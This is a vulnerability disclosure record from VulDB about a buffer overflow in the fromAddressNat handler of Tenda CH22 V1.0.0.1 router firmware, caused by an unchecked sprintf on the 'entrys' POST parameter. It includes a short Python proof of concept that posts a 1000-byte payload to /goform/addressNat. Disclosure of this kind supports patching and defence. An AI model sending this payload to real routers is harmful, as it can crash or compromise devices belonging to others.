| Title | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| Description | ## Overview
- Firmware download website: https://www.tenda.com.cn/download/2230
## Affected version
CH22 V1.0.0.1
## Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `fromAddressNat` function. The `v8` variable receives the `entrys` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `entrys` , the statement `sprintf(s, "%s;%s", v8, v7);` can cause a buffer overflow.
## PoC
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/addressNat'
payload = b'a' * 1000
data = {
'entrys':payload
}
requests.post(url, data=data) |
|---|
| Source | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromAddressNat-377df0aa1185807ab2aef43f7f9791f9 |
|---|
| User | ysnysn0121 (UID 86198) |
|---|
| Submission | 06/08/2026 17:46 (1 month ago) |
|---|
| Moderation | 07/09/2026 07:54 (1 month later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 329944 [Tenda CH22 1.0.0.1 /goform/addressNat fromAddressNat page buffer overflow] |
|---|
| Points | 0 |
|---|